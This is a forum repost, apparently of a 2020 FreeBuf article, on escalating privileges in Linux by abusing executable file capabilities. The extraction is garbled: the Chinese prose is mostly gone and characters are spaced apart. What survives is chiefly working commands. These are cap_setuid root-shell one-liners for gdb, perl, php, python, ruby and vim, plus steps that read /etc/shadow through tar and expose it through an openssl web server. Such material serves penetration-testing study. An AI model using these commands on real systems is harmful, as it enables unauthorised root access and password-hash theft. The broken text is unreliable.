搜索

[15977] 2020-10-17_Linux系统利用可执行文件的Capabilities实现权限提升

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2020-10-17_Linux系统利用可执行文件的Capabilities实现权限提升 L i n u x C a p a b i l i t i e s r e g i t n e w   F r e e B u f   2 0 2 0 - 1 0 - 1 7 C a p a b i l i t i e s L i n u x 2 . 2 r o o t U I D = 0 C a p a b i l i t e s 线 L i n u x 线 线 r o o t c a p a b i l i t i e s C a p a b i l i t i e s h o s t k a l i   l i n u x   2 0 2 0 v i r t u a l b o x C e n t O S   7 L i n u x   C a p a b i l i t i e s 1   L i n u x C a p a b i l i t i e s L i n u x c a p a b i l i t i e s l i b c a p l i b c a p - n g l i b c a p g e t c a p s e t c a p c a p a b i l i t i e s c a p s h s h e l l c a p a b i l i t i e s l i b c a p - n g 使 使 f i l e c a p c a p a b i l i t i e s 2   C a p a b i l i t i e s 1 C a p a b i l i t y w i r e s h a r k
/ u s r / b i n / d u m p c a p c a p a b i l i t i e s s e t c a p   c a p _ n e t _ r a w , c a p _ n e t _ a d m i n = e i p   / u s r / b i n / d u m p c a p w i r e s h a r k 2 C a p a b i l i t y g e t c a p   / u s r / b i n / d u m p c a p     / / c a p a b i l i t i e s
3 c a p a b i l i t i e s s e t c a p   - r   / u s r / b i n / d u m p c a p C a p a b i l i t i e s c a p a b i l i t i e s g e t c a p   - r   /   2 > / d e v / n u l l c a p a b i l i t y c a p _ s e t u i d c a p a b i l i t i e s c a p _ s e t u i d s u i d c a p _ s e t u i d c a p a b i l i t y s u i d s u i d c a p _ s e t u i d c a p a b i l i t y 1   g d b g d b   - n x   - e x   p y t h o n   i m p o r t   o s ;   o s . s e t u i d ( 0 )   - e x   ! s h   - e x   q u i t
r o o t   s h e l l 2   p e r l p e r l   - e   u s e   P O S I X   q w ( s e t u i d ) ;   P O S I X : : s e t u i d ( 0 ) ;   e x e c   / b i n / s h ; r o o t   s h e l l 3   p h p p h p   - r   p o s i x _ s e t u i d ( 0 ) ;   s y s t e m ( / b i n / s h ) ; k a l i   l i n u x r o o t   s h e l l C e n t O S   7 p h p 4   p y t h o n p y t h o n   - c   i m p o r t   o s ;   o s . s e t u i d ( 0 ) ;   o s . s y s t e m ( / b i n / s h )
r o o t   s h e l l 5   r u b y r u b y   - e   P r o c e s s : : S y s . s e t u i d ( 0 ) ;   e x e c   / b i n / s h r o o t   s h e l l 6   r v i m r v i m   - c   : p y   i m p o r t   o s ;   o s . s e t u i d ( 0 ) ;   o s . e x e c l ( / b i n / s h ,   s h ,   - c ,   r e s e t ;   e x e c   s h ) r o o t   s h e l l 7   v i m v i m   - c   : p y   i m p o r t   o s ;   o s . s e t u i d ( 0 ) ;   o s . e x e c l ( / b i n / s h ,   s h ,   - c ,   r e s e t ;   e x e c   s h )
r o o t   s h e l l 8   t a r c a p _ d a c _ r e a d _ s e a r c h / t a r   c v f   s h a d o w . t a r   / e t c / s h a d o w     / / t a r   - x v f   s h a d o w . t a r     / / c d   e t c     / / c h m o d   + r   s h a d o w     / / c a t   s h a d o w   |   g r e p   r o o t     / / s h a d o w / e t c / s h a d o w z i p 9   o p e n s s l
o p e n s s l c a p a b i l i t y 使 o p e n s s l / e t c / s h a d o w / / 使 o p e n s s l c d   / t m p o p e n s s l   r e q   - x 5 0 9   - n e w k e y   r s a : 2 0 4 8   - k e y o u t   k e y . p e m   - o u t   c e r t . p e m   - d a y s   3 6 5   - n o d e s / / w e b 1 3 3 7 c d   / o p e n s s l   s _ s e r v e r   - k e y   / t m p / k e y . p e m   - c e r t   / t m p / c e r t . p e m   - p o r t   1 3 3 7   - H T T P / / 访 w e b / e t c / s h a d o w c u r l   - k   h t t p s : / / 1 2 7 . 0 . 0 . 1 : 1 3 3 7 / e t c / s h a d o w h t t p s : / / g t f o b i n s . g i t h u b . i o / h t t p s : / / w w w . h a c k i n g a r t i c l e s . i n / l i n u x - p r i v i l e g e - e s c a l a t i o n - u s i n g - c a p a b i l i t i e s / h t t p s : / / m e d i u m . c o m / @ i n t 0 x 3 3 / d a y - 4 4 - l i n u x - c a p a b i l i t i e s - p r i v i l e g e - e s c a l a t i o n - v i a - o p e n s s l - w i t h - s e l i n u x - e n a b l e d - a n d - e n f o r c e d - 7 4 d 2 b e c 0 2 0 9 9

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理